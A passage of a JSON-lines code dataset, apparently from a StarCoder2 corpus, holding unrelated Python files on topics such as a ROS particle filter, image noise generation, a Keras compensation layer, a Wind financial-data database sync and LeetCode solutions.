c in lookup.keys():\n if char in lookup:\n stack.append(lookup[char])\n if char in lookup.values():\n if not stack:\n return False\n if char != stack.pop():\n return False\n if stack:\n return False\n return True\n\n\nif __name__ == '__main__':\n import json\n d = {'key1': 'value1', 'key2': [1, 2, 3], 'key3': (1, 2, 3)}\n s = json.dumps(d)\n print(s)\n print(validate_format(s))\n s += '('\n print(s)\n print(validate_format(s))\n","sub_path":"algo_sample/29_stack_quiz_json/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459711379","text":"#!/usr/bin/env python \nimport sys\nimport os\nimport math\nimport rospy\nimport numpy as np\nimport tf\nimport tf2_ros\nimport tf_conversions\n\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom nav_msgs.msg import Odometry\n\n#import geometry_msgs.msg\n#import fiducial_msgs.msg\n#from fiducial_msgs.msg import FiducialTransformArray, FiducialArray\n#from geometry_msgs.msg import Pose, PoseWithCovariance, TransformStamped, PoseStamped \n#from tf.transformations import quaternion_from_euler, euler_from_quaternion\n\n\nclass ArucoParticleFilterRemote():\n\n def __init__(self):\n ## Pull necessary ROS parameters from launch file:\n\n # Read pose observation topic (pose estimated from aruco detection) \n param = rospy.search_param(\"pose_observation_topic\")\n self.pose_obs_top = rospy.get_param(param)\n # Read prediction update topic (EKF filtered odometry from IMU and ctrl inputs) \n param = rospy.search_param(\"prediction_update_topic\")\n self.pred_up_top = rospy.get_param(param)\n # Read particle filter estimate topic (output of this node)) \n param = rospy.search_param(\"particle_filtered_pose_topic\")\n self.pf_pose_top = rospy.get_param(param)\n # Read particle count \n param = rospy.search_param(\"particle_count\")\n self.pc = rospy.get_param(param)\n \n # Read covariance values \n param = rospy.search_param(\"initial_estimate_covariance\")\n self.init_cov = rospy.get_param(param)\n param = rospy.search_param(\"linear_process_covariance\")\n self.pl_cov = rospy.get_param(param)\n param = rospy.search_param(\"angular_process_covariance\")\n self.pa_cov = rospy.get_param(param)\n param = rospy.search_param(\"linear_observation_covariance\")\n self.ol_cov = rospy.get_param(param)\n param = rospy.search_param(\"angular_observation_covariance\")\n self.oa_cov = rospy.get_param(param)\n\n\n # Initialize callback variables\n self.obs_pose = None\n self.pred_odom = None\n\n # Initialize class variables\n self.time = None\n self.old_time = None\n self.old_theta = 0\n self.ang_z_obs = 0\n self.obs_pose_old = None\n self.innov = np.zeros((self.pc,3))\n self.likeli = np.zeros((self.pc,1))\n\n # Establish subscription to observation pose\n rospy.Subscriber(self.pose_obs_top, PoseWithCovarianceStamped, self.obs_pose_callback)\n # Establish subscription to prediction update odometry\n rospy.Subscriber(self.pred_up_top, Odometry, self.pred_up_callback)\n # Delay briefly to allow subscribers to find messages\n rospy.sleep(0.5)\n\n # Build the process and observation covariance matrices\n self.cov_matrices_build()\n\n # Initialize array of particle states | # particles x 4 [x, y, theta_z, weight]\n self.particles = (np.random.rand(self.pc,4)-0.5)*(2*self.init_cov)\n # Initialize angles on range [-pi, pi]\n #self.particles[:,2] = (np.random.rand(self.pc,)-0.5)*(2*np.pi)\n # Initialize all angles to 0 | works better for non-global 
localization\n self.particles[:,2] = np.zeros((self.pc,))\n # Set all particle weights equal\n self.particles[:,3] = np.ones((self.pc,))\n\n # Initialize publisher for estimated pose of vehicle in map frame\n self.posepub = rospy.Publisher(self.pf_pose_top, PoseWithCovarianceStamped, queue_size=10)\n self.pub = PoseWithCovarianceStamped()\n\n\n ##### Primary particle filter functions #####\n\n # Function to call all functions and run particle filter\n def run_pf(self):\n while not rospy.is_shutdown(): \n # Only predict when a filtered odometry (IMU and ctrl) comes in\n if self.pred_odom != None and np.absolute(self.pred_odom.twist.twist.linear.x) > 0.01:\n # Track prediction message timestamp\n self.time = self.pred_odom.header.stamp.secs + self.pred_odom.header.stamp.nsecs*10**-9\n if self.old_time and self.time > self.old_time:\n self.predict()\n # Update previous timestamp for comparison to next\n self.old_time = self.time\n\n # Only update observation when an aruco-based pose measurement comes in\n if self.obs_pose != None and self.obs_pose != self.obs_pose_old:\n self.obs_update()\n self.weight()\n self.mult_resample() # Option to use multinomial resampling\n #self.sys_resample() # Option to use systematic resampling\n self.obs_pose_old = self.obs_pose\n \n self.particle_publish()\n \n # Function for process/prediction step \n def predict(self):\n # Use covariance to calculate gaussian noise for prediction\n pnoise = self.gaussian_noise(self.pcov_matrix)\n \n # Unpack odometry message\n xvel = self.pred_odom.twist.twist.linear.x\n yvel = self.pred_odom.twist.twist.linear.y\n quat = (self.pred_odom.pose.pose.orientation.x, self.pred_odom.pose.pose.orientation.y,\n self.pred_odom.pose.pose.orientation.z, self.pred_odom.pose.pose.orientation.w)\n _, _, theta = tf.transformations.euler_from_quaternion(quat)\n omega = self.pred_odom.twist.twist.angular.z\n \n # Calculate timestep from last prediction update\n dt = self.time - self.old_time\n \n # Update particle pose estimates based on angular and linear velocities from odometry \n self.particles[:,0] = self.particles[:,0] + pnoise[:,0] + xvel*dt*np.cos(self.particles[:,2]) \n self.particles[:,1] = self.particles[:,1] + pnoise[:,1] + xvel*dt*np.sin(self.particles[:,2]) \n self.particles[:,2] = self.particles[:,2] + pnoise[:,2] + (theta - self.old_theta)\n # self.particles[:,2] = self.particles[:,2] + pnoise[:,2] + omega*dt # Alternative angle calculation\n # Force angles to be on range [-pi, pi]\n self.particles[:,2] = np.remainder(self.particles[:,2]+np.pi,2*np.pi)-np.pi\n # Update old theta for comparison\n self.old_theta = theta\n\n # Function for observation update\n def obs_update(self):\n # Unpack observation pose estimates\n x_obs = self.obs_pose.pose.pose.position.x\n y_obs = self.obs_pose.pose.pose.position.y\n quat = (self.obs_pose.pose.pose.orientation.x, self.obs_pose.pose.pose.orientation.y,\n self.obs_pose.pose.pose.orientation.z, self.obs_pose.pose.pose.orientation.w)\n _, _, self.ang_z_obs = tf.transformations.euler_from_quaternion(quat)\n\n # Calculate Innovation (difference from measurement to particle pose)\n self.innov[:,0] = x_obs - self.particles[:,0]\n self.innov[:,1] = y_obs - self.particles[:,1]\n self.innov[:,2] = self.ang_z_obs - self.particles[:,2]\n # Force angles to be on range [-pi, pi]\n self.innov[:,2] = np.remainder(self.innov[:,2]+np.pi,2*np.pi)-np.pi \n\n # Calculate likelihood\n self.likeli = np.exp(-0.5*np.sum(np.square(self.innov).dot(np.linalg.inv(self.ocov_matrix)), axis=1))\n 
#*(1/(2*np.pi*np.sqrt(np.linalg.det(self.ocov_matrix)))) # Constant not needed\n \n print(sum(self.likeli))\n # Function to reassign weights to particles\n def weight(self):\n self.particles[:,3] = self.likeli#/sum(self.likeli) #reweight occurs in resample functions\n\n # Function to resample particles | Systematic Resampling\n def mult_resample(self):\n # Define cumulative density function\n cdf = np.cumsum(self.particles[:,3])\n cdf /= cdf[cdf.size-1]\n\n # Temporarily store old particle poses and set new to zero\n temp = self.particles[:,[0,1,2]]\n self.particles = np.zeros((self.pc,4))\n # Systematic Resampling\n r = np.random.rand(self.pc,1)\n for i in range(cdf.size):\n ind = np.argmax(cdf >= r[i])\n self.particles[i,[0,1,2]] = temp[ind,:]\n\n # Reassign even weight of 1 to all new particles\n self.particles[:,3] = np.ones((self.pc,))\n\n\n # Function to resample particles | Systematic Resampling\n def sys_resample(self):\n # Define cumulative density function\n cdf = np.cumsum(self.particles[:,3])\n cdf /= cdf[cdf.size-1]\n\n # Temporarily store old particle poses and set new to zero\n temp = self.particles[:,[0,1,2]]\n self.particles = np.zeros((self.pc,4))\n # Systematic Resampling\n r = np.random.rand(1)/self.pc\n for i in range(cdf.size):\n ind = np.argmax(cdf >= (r + (i-1)/self.pc))\n self.particles[i,[0,1,2]] = temp[ind,:]\n # Reassign even weight of 1 to all new particles\n self.particles[:,3] = np.ones((self.pc,))\n #print(self.particles)\n\n\n ##### Support Functions #####\n\n # Function to publish average of particle poses\n def particle_publish(self):\n self.pub.pose.pose.position.x = np.average(self.particles[:,0])\n self.pub.pose.pose.position.y = np.average(self.particles[:,1])\n self.pub.pose.pose.orientation.z = np.average(self.particles[:,2]) \n # Theta needs to be converted to quaternion to be useful for anything other than plotting!\n \n self.posepub.publish(self.pub) \n\n # Function to build 3x3 process and observation covariance matrices\n def cov_matrices_build(self):\n # Build process covariance matrix\n self.pcov_matrix = np.array([[self.pl_cov, 0.0, 0.0],\n [0.0, self.pl_cov, 0.0],\n [0.0, 0.0, self.pa_cov]])\n # Build observation covariance matrix\n self.ocov_matrix = np.array([[self.ol_cov, 0.0, 0.0],\n [0.0, self.ol_cov, 0.0],\n [0.0, 0.0, self.oa_cov]])\n\n # Function to assign gaussian noise from diagonalcovariance matrix\n def gaussian_noise(self, cov_mat):\n var = np.diagonal(cov_mat)\n noise = np.sqrt(var)*np.random.randn(self.pc, 3)\n return noise\n\n # Callback function for observation pose subscription (from aruco_detect)\n def obs_pose_callback(self, obs_pose_msg):\n self.obs_pose = obs_pose_msg\n\n # Callback function for prediction odometry subscription (from EKF)\n def pred_up_callback(self, pred_up_msg):\n self.pred_odom = pred_up_msg\n\nif __name__ == '__main__':\n # Initialize ROS node\n rospy.init_node('particle_filter_aruco_remote', anonymous=True)\n rospy.loginfo(\"Successful initilization of node\")\n \n # Create particle filter class\n pf = ArucoParticleFilterRemote()\n rospy.loginfo(\"ArucoParticleFilterRemote class successfully created\")\n \n # Run particle filter\n pf.run_pf()","sub_path":"python_nodes/particle_filter_aruco_remote.py","file_name":"particle_filter_aruco_remote.py","file_ext":"py","file_size_in_byte":10847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224868979","text":"import glob as gb\nfrom PIL import Image\n\nfrom pylab import *\n\nfrom numpy import 
*\nimport ipdb\nimport random\n#产生数据\n#读取图像,转化为灰度图,并添加 均值为0,方差为25的高斯噪声,保存图像\nimg_path = gb.glob(\"/home/bobo/data/VOCdevkit/Pascal VOC2007/VOCdevkit/VOC2007/JPEGImages/*.jpg\")\n\nii = 0;\nfor path in img_path:\n # 只拿15000张照片 其实只有5000张照片\n\n if (ii < 15000):\n # 读取图像,转化为灰度图\n im = array(Image.open(path).convert('L'))\n # 设定高斯函数的偏移\n means = 0\n # 设定高斯函数的标准差\n sigma = 25\n im_flatten = im[:, :].flatten()\n # 计算新的像素值\n for i in range(im.shape[0] * im.shape[1]):\n pr = int(im_flatten[i]) + random.gauss(0, sigma)\n #小于0置为0\n if (pr < 0):\n pr = 0\n # 大于255,置为255\n if (pr > 255):\n pr = 255\n im_flatten[i] = pr\n im[:, :] = im_flatten.reshape([im.shape[0], im.shape[1]])\n # 保存灰度图\n from scipy import misc\n # 拿到照片名字\n imgs_name = path.split('.')[-2].split('/')[-1]\n # 保存图像\n misc.imsave(\n '/home/bobo/data/VOCdevkit/Pascal VOC2007/VOCdevkit/VOC2007/JPEGImages_Noise_added_grayscale/' + imgs_name + '.jpg',\n im)\n\n# 读取该JPEGImages_Noise_added_grayscale目录下所有的jpg文件\nimg_path2 = gb.glob(\"/home/bobo/data/VOCdevkit/Pascal VOC2007/VOCdevkit/VOC2007/JPEGImages_Noise_added_grayscale/*.jpg\")\nprint(img_path2.__len__())","sub_path":"ImageDenoising_pytorch/data/porductData.py","file_name":"porductData.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475312334","text":"import os\nimport shutil\n\nfor f in os.listdir('.'):\n if f.endswith('.pdf') == False:\n continue\n\n d = f[0]\n\n if not os.path.exists(d):\n os.mkdir(d)\n\n shutil.move(f, os.path.join(d, f))\n\n","sub_path":"mv_separate.py","file_name":"mv_separate.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"18752236","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nclass Tools:\n\t\"\"\"\n\t**Tool**\n\tTools class, tools needed in most of the code all the same\n\t\"\"\"\n\n\tdef unicode_safe(self,word):\n\t\t\"\"\"unicode safe code (https://code.djangoproject.com/ticket/170)\"\"\"\n\t\tif type(word) == unicode:\n\t\t\tword = word.encode('utf-8')\n\t\treturn word\n\t\n\t#calculate median for an array of number\n\tdef calc_median(self,number_list):\n\t\tvalues = sorted(number_list)\n\t\tif(len(values)%2==1):\n\t\t\t#odd number of elements\n\t\t\treturn values[((len(values)+1)/2)-1]\n\t\telse:\n\t\t\t#even number\n\t\t\tlower = values[(len(values)/2)-1]\n\t\t\tupper = values[(len(values)/2)]\n\t\t\treturn (float(lower+upper))/2\n\t\n\t#calculate the average\n\tdef calc_average(self,sum_of,count):\n\t\t#no divide / 0\n\t\taverage = 0\n\t\tif((count)!= 0):\n\t\t\taverage = float(sum_of)/count\n\t\treturn average\n\n\t#calculate the some of an array numbers\n\tdef calc_sum(self,array_of_numbers):\n\t\tsum_of = 0\n\t\tfor i in array_of_numbers:\n\t\t\tsum_of = sum_of + i\n\t\treturn sum_of\n\n","sub_path":"drama/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"353936597","text":"from sellmo import modules\nfrom sellmo.api.decorators import link\n\nfrom django.shortcuts import render\n\n\nnamespace = modules.product.namespace\n\n\n@link()\ndef product(request, product, context, **kwargs): \n context.update({\n 'product': product\n })\n return render(request, 'product/product.html', context) 
","sub_path":"skeleton/product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"264739100","text":"import logging\nfrom ibmsecurity.utilities import tools\n\nlogger = logging.getLogger(__name__)\n\n\ndef run(isamAppliance, application_interface, statistics_duration, check_mode=False, force=False):\n \"\"\"\n Retrieving the Application Interface Statistics\n \"\"\"\n return isamAppliance.invoke_get(\"Run pdadmin command\",\n \"/analysis/interface_statistics.json{0}\".format(\n tools.create_query_string(prefix=application_interface,\ntimespan=statistics_duration)))\n","sub_path":"ibmsecurity/isam/pdadmin.py","file_name":"pdadmin.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169782131","text":"import sys\nimport os\nimport Xlib.rdb\nimport traceback\nfrom events.event_dispatcher import EventDispatcher\nfrom util.log_utils import log_error\n\ndisplay, appname, resource_database, args = Xlib.rdb.get_display_opts(Xlib.rdb.stdopts)\n\nclass NoUnmanagedScreens(Exception):\n pass\n\nclass Plexi:\n def __init__(self, display):\n self.display = display\n if display:\n os.environ['DISPLAY'] = display.get_display_name()\n\n self.event_dispatcher = EventDispatcher(display)\n\n if len(self.event_dispatcher.screens) == 0:\n raise NoUnmanagedScreens()\n\n self.display.set_error_handler(self.x_error_handler)\n\n\n def x_error_handler(self, err, request):\n log_error('X protocol error: {0}'.format(err))\n\n\nwm = Plexi(display)\n","sub_path":"plexi.py","file_name":"plexi.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"589487812","text":"class Solution(object):\n def isInterleave(self, s1, s2, s3):\n \"\"\"\n :type s1: str\n :type s2: str\n :type s3: str\n :rtype: bool\n \"\"\"\n if s1 == None or s2 == None or s3 == None or len(s3)!=len(s1) + len(s2):\n return False\n m = len(s1)\n n = len(s2)\n # dp[n+1][m+1]\n dp = [[False for i in range(n+1)] for j in range(m+1)]\n # dp = [[False] * (m+1)] * (n+1) \n dp[0][0] = True\n for i in range(1,m+1):\n dp[i][0] = s1[i-1] == s3[i-1] and dp[i-1][0]\n \n for j in range(1, n+1):\n dp[0][j] = (s2[j-1] == s3[j-1]) and dp[0][j-1]\n \n for i in range(1,m+1):\n for j in range(1,n+1):\n dp[i][j] = (dp[i-1][j] & (s1[i-1] == s3[i+j-1])) |(dp[i][j-1] & (s2[j-1] == s3[i+j-1]))\n \n return dp[m][n]\n \n","sub_path":"97-Interleaving-String/InterleavingString.py","file_name":"InterleavingString.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"443568053","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\httphelp\\content_generator.py\n# Compiled at: 2018-11-27 06:45:48\n# Size of source mod 2**32: 2131 bytes\nimport sys, yaml, urwid\nfrom httphelp.constants import CURR_DIR\nfrom httphelp.app_handler import Scrollable\n\ndef __load_file_data(num):\n copyleft = yaml.safe_load(open('/'.join([CURR_DIR, 'copyright_description.yml']), 'r'))\n if num:\n return copyleft['statuscode']\n return copyleft['headers']\n\n\ndef generate_content(status_code):\n try:\n code_descriptions, num, status_code = 
get_yaml_dictionary(status_code)\n content = code_descriptions[status_code]\n pile = urwid.Pile([\n urwid.Text('HTTPHELP: The Manual for HTTP Status Codes and Headers\\n', align='center'),\n urwid.Text(('title', 'STATUS MESSAGE' if num else 'HEADER INFO')),\n urwid.Padding((urwid.Text(''.join([str(status_code), ': ' if num else ', Example= ', content['message'], '\\n']))),\n left=5),\n urwid.Text(('title', 'CATEGORY')),\n urwid.Padding((urwid.Text(''.join([content['category'], '\\n']))), left=5),\n urwid.Text(('title', 'DESCRIPTION')),\n urwid.Padding((urwid.Text(''.join([content['description'], '\\n']))), left=5),\n urwid.Text(('title', 'COPYRIGHT')),\n urwid.Padding((urwid.Text(''.join([__load_file_data(num), '\\n']))), left=5)])\n padding = urwid.Padding((Scrollable(pile)), left=1, right=1)\n return padding\n except KeyError:\n return\n\n\ndef get_yaml_dictionary(status_code):\n try:\n status_code = int(status_code)\n num = True\n filename = 'code_descriptions.yml'\n except (TypeError, ValueError):\n num = False\n filename = 'header_descriptions.yml'\n\n try:\n code_descriptions = yaml.safe_load(open('/'.join([CURR_DIR, filename]), 'r'))\n except yaml.constructor.ConstructorError:\n print('Invalid file. Only support valid json and yaml files.')\n sys.exit(1)\n\n return (code_descriptions, num, status_code)","sub_path":"pycfiles/httphelp-1.1.1.post1-py3.7/content_generator.cpython-37.py","file_name":"content_generator.cpython-37.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"260593449","text":"#!/usr/bin/env python\n#coding:utf-8\n\"\"\"\n Author: Wusf --<>\n Purpose: \n Created: 2015/3/19\n\"\"\"\n\nimport logging\nimport sys\nimport cx_Oracle\nimport ConfigParser\nimport sqlite3\nfrom PyQt4 import QtGui,QtCore\nimport time \nimport os\nfrom dateutil import parser\n\nrootD = os.path.abspath('../../')\nsys.path.append(rootD)\nimport global_config as config\nimport qsdp_lib.tool.wind_db_tools.ConnectToWindDatabase as CWD\nimport qsdp_lib.tool.local_db_tools.GetAllWindStockCode as GLSI\nimport qsdp_lib.tool.local_db_tools.GetTradeDays as GTD\n\n\n\n########################################################################\nclass SyncDividentIssueRelatedData(object):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n \n conf = ConfigParser.ConfigParser()\n conf.read(config.DB_CONFIG_PATH)\n self._stockListDire = conf.get(\"LocalWindSyncDatabase\",\"StockCodePath\")\n self._stockListFile = conf.get(\"LocalWindSyncDatabase\",\"StockCodeFile\" )\n self._corporateActionDire = conf.get(\"EventAndNewsDatabase\",\"RawEventDataPath\")\n #self._corporateActionFile = conf.get(\"EventAndNewsDatabase\",\"db_CorpActionStockDivident\")\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.DEBUG)\n\n #----------------------------------------------------------------------\n def CreateLocalDatabase(self):\n \"\"\"\"\"\"\n self.logger.info(\"Create local database: corporate action - stock divident\")\n liteConn = sqlite3.connect(self._corporateActionDire+'RawEvent.db')\n liteCur = liteConn.cursor()\n liteConn.execute(\"Drop table if exists DividentIssue\")\n liteSql = \"Create table DividentIssue(TradeID text,WindGenTime datetime,WindUpdateTime datetime,WindID text,BonusStkDeno double,BonusStkNume double,TransStkDeno double,TransStkNume double,DivDeno,DivBfT double,DivAfT double, DivYear text,RegistDay 
text,ExDivDay text,DivDistDay text,DivStkTrdDay text,PrePlanPreAnnounDay text,AnnounDay text,PrePlanAnnounDay text,MeetingAnnounDay text,ImplemDay text,Progress int)\"\n self.logger.info('SQL:'+liteSql)\n liteConn.execute(liteSql)\n liteConn.commit() \n \n #----------------------------------------------------------------------\n def Sync(self):\n \"\"\"\"\"\"\n self.logger.info(\"Synchronize local database: corporate action - stock divident\")\n windConn = CWD.ConnectToWindDatabase() \n liteConn = sqlite3.connect(self._corporateActionDire+'RawEvent.db')\n liteCur = liteConn.cursor()\n startTime = \"2009-01-01\"\n orSql = \"select ob_release_date_1093,rp_gen_datetime,f1_1093,f4_1093,f5_1093,f6_1093,f7_1093,f8_1093,f9_1093,f10_1093,f24_1093,f25_1093,f26_1093,f27_1093,f28_1093,f33_1093,f36_1093,f41_1093,f42_1093,f43_1093,f3_1093 from winddb.tb_object_1093 where ob_release_date_1093> to_date('%s','yyyy-mm-dd hh24:mi:ss') \"%(startTime)\n liteSql = \"Insert into DividentIssue(TradeID,WindGenTime,WindUpdateTime,WindID,BonusStkDeno,BonusStkNume,TransStkDeno,TransStkNume,DivDeno,DivBfT,DivAfT,DivYear,RegistDay,ExDivDay,DivDistDay,DivStkTrdDay,PrePlanPreAnnounDay,AnnounDay,PrePlanAnnounDay,MeetingAnnounDay,ImplemDay,Progress) values(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\"\n orCur = windConn.cursor()\n orCur.execute(orSql)\n content = orCur.fetchall()\n windID_trdID = GLSI.GetAllWindStockCode()[0]\n for row in content:\n #print windID_trdID[row[2]]\n if windID_trdID.has_key(row[2]):\n liteCur.execute(liteSql, (windID_trdID[row[2]][0],)+row)\n self.logger.info(liteSql+windID_trdID[row[2]][0]+str(row[1:]))\n liteConn.commit()\n liteConn.close()\n windConn.close()\n \n \n \n \n \n\n \nif __name__ == \"__main__\":\n \n SDD = SyncDividentIssueRelatedData()\n SDD.CreateLocalDatabase()\n SDD.Sync()\n \n \n \n \n \n","sub_path":"qs_lib/_backups/sync_wind/SyncEvent_DividentIssueRelated.py","file_name":"SyncEvent_DividentIssueRelated.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"409522080","text":"import numpy as np\n\n\n# isSmoke | isObesity | isDoExercise\n# We predict whether the person is diabet or not in the future\n\nfeature_set = np.array([[0, 1, 0], [0, 0, 1], [1, 0, 0], [1, 1, 0], [1, 1, 1]]) # 5 x 3\nlabels = np.array([[1, 0, 0, 1, 1]]).reshape(5, 1) # 5 x 1\n\n\nweights = np.random.randn(3, 1) # weights\nbias = np.random.randn(1) # bias\n\n\nlearning_rate = 0.5\n\ndef sigmoid(x):\n return (1 / (np.exp(-x) + 1))\n\ndef sigmoid_der(x):\n return (sigmoid(x) * (1 - sigmoid(x)))\n\nfor epoch in range(20000):\n input_set = feature_set.T\n\n # Feed forward\n\n predicted = sigmoid(np.dot(feature_set, weights) + bias)\n\n error = predicted - labels\n print(error.sum())\n\n # Backpropagation\n dcost_dpred = error\n dpred_dz = sigmoid_der(predicted)\n\n z_delta = dcost_dpred * dpred_dz\n\n weights -= learning_rate * np.dot(input_set, z_delta)\n for num in z_delta:\n bias -= learning_rate * num\n\n\n# Example\n\nexample_data = np.array([0, 1, 1])\n\npredicted_output = sigmoid(np.dot(example_data, weights) + bias)\n\nprint(predicted_output)\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286933097","text":"from keras.engine.topology import Layer\nimport keras.backend as K\nfrom keras.utils import conv_utils\n\nclass CompenastionLayer(Layer):\n \"\"\"\n 
完成卷积分解后的补偿,主要先通过一个可分离卷积获取形状然后通过1*1的卷积补充通道\n \n \"\"\"\n def __init__(self,filters,kernel_size,strides=(1,1),padding='valid',kernel_regularizer=None,fist_layer=False,alph=0.125,kernel_initializer='glorot_uniform',**kwargs):\n \n self.filters=filters\n self.kernel_size=kernel_size\n self.strides=strides\n self.padding=padding\n self.kernel_regularizer=kernel_regularizer\n self.kernel_initializer=kernel_initializer\n self.fist_layer=fist_layer\n if self.fist_layer:\n self.alph=1.0\n else:\n self.alph=alph\n super(CompenastionLayer, self).__init__(**kwargs)\n \n def build(self,input_shape):\n \n depthwise_kernel_shape = (self.kernel_size[0],\n self.kernel_size[1],\n input_shape[3],\n 1)\n self.depthwise_kernel = self.add_weight(\n shape=depthwise_kernel_shape,\n initializer=self.kernel_initializer,\n name='depthwise_kernel',\n regularizer=self.kernel_regularizer)\n \n self.kernel=self.add_weight(\n shape=(1,1,int(self.alph*input_shape[3]),self.filters),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer)\n \n self.built = True\n \n def call(self,x):\n depthwise_outputs=K.depthwise_conv2d(x,self.depthwise_kernel,\n strides=self.strides,\n padding=self.padding,)\n if self.fist_layer:\n x1=depthwise_outputs\n else:\n num=int(self.alph*K.int_shape(depthwise_outputs)[-1])\n step=int(1/self.alph)\n T=[]\n for i in range(0,num,2):\n a1=depthwise_outputs[:,:,:,(i*step):(i+1)*step]\n a2=depthwise_outputs[:,:,:,((i+1)*step):(i+2)*step]\n T.append(K.sum(a1,axis=-1,keepdims=True))\n T.append(K.sum(a2,axis=-1,keepdims=True))\n x1=K.concatenate(T)\n \n x1=K.relu(x1)\n outputs=K.conv2d(x1,self.kernel)\n \n return outputs\n \n def compute_output_shape(self,input_shape):\n \n rows = input_shape[1]\n cols = input_shape[2]\n rows = conv_utils.conv_output_length(rows, self.kernel_size[0],\n self.padding,\n self.strides[0])\n cols = conv_utils.conv_output_length(cols, self.kernel_size[1],\n self.padding,\n self.strides[1])\n \n return (input_shape[0],rows,cols,self.filters)\n \n\n","sub_path":"代码/vgg/group_compensation.py","file_name":"group_compensation.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308551615","text":"from collections import defaultdict\nclass Solution:\n def decodeString(self, s):\n stack = []\n tstr = []\n tnum = -1\n for c in s:\n if c == ']':\n tstr = []\n while stack[-1] != '[':\n tstr.append(stack.pop())\n stack.pop()\n tnum = 0\n base = 1\n while stack and stack[-1].isdigit():\n tnum += int(stack.pop()) * base\n base *= 10\n tstr = tstr * tnum\n for ts in tstr[::-1]:\n stack.append(ts)\n else:\n stack.append(c)\n \n ans = []\n while stack:\n ans = [stack.pop()] + ans\n ans = ''.join(ans)\n return ans\n\n\n\n\n\n \nif __name__ == '__main__':\n sol = Solution()\n \n s = \"3[a]2[bc]\"\n s = \"3[a2[c]]\"\n s = \"2[abc]3[cd]ef\"\n s = \"abc3[cd]xyz\"\n s = \"3[a]2[b4[F]c]\"\n s = \"2[ab3[cd]]4[xy]\"\n s = \"100[leetcode]\"\n print(s)\n r = sol.decodeString(s)\n print(r)\n \n\n","sub_path":"lc_394_decode_string.py","file_name":"lc_394_decode_string.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161923017","text":"\"\"\"\ngeometry.py\n\nModule containing transformations related to geometry.\n\"\"\"\nfrom math import ceil\n\nimport torch\n\n\nclass ShiftsMismatchError(Exception):\n pass\n\n\nclass Geometry2D:\n \"\"\"Define the 2D geometry, which can 
return shifts which index flattened\n returning shifted flattened states, where the shift is some shift on the\n original lattice\n \"\"\"\n\n def __init__(self, length):\n self.length = length\n # Hard code the checkerboard pattern, could be passed to class.\n checkerboard = torch.zeros((self.length, self.length), dtype=bool)\n checkerboard[1::2, 1::2] = True\n checkerboard[::2, ::2] = True\n self.checkerboard = checkerboard\n self.flat_checker = self.checkerboard.flatten()\n # make split-flat state like object with corresponding indices in flat state\n self.flat_ind_like_split = torch.cat(\n [\n torch.where(checkerboard.flatten())[0],\n torch.where(~checkerboard.flatten())[0],\n ],\n dim=0,\n )\n self.split_ind_like_state = self._split_indices_like_state()\n\n def _split_indices_like_state(self):\n \"\"\"Internal function for calculating the split index like state, which\n is the index of phi_a and phi_b in the flattened state, arranged in the\n shape of the 2D state, used in get_shift\n \"\"\"\n splitind_like_state = torch.zeros((self.length, self.length), dtype=torch.int)\n splitind_like_state[self.checkerboard] = torch.arange(\n int(ceil(self.length ** 2 / 2)), dtype=torch.int\n )\n splitind_like_state[~self.checkerboard] = torch.arange(\n int(ceil(self.length ** 2 / 2)), self.length ** 2, dtype=torch.int\n )\n return splitind_like_state\n\n def get_shift(self, shifts: tuple = (1, 1), dims: tuple = (0, 1)) -> torch.Tensor:\n r\"\"\"Given length, which refers to size of a 2D state (length * length)\n returns a Nx(length^2) tensor where N is the length of `shifts` and `dims`\n (which must be equal). Each row of the returned tensor indexes a flattened\n split state \\phi = (\\phi_even, \\phi_odd) which is split according to a\n checkerboard geometry (even and odd refer to parity of the site). The\n indices refer to shifts on the states in their original 2D form. By default\n N = 2 and get_shift simply returns the right and down nearest neighbours.\n\n Parameters\n ----------\n shifts: tuple\n a tuple of shifts to be applied. Each element represents a shift and can\n either be an integer (if the shift is in a single dimension) or a tuple\n if the shift is applied simultaneously in multiple dimensions (see\n Examples). By default it is set to have two shifts which give right and\n down nearest neighbours\n dims: tuple\n a tuple of 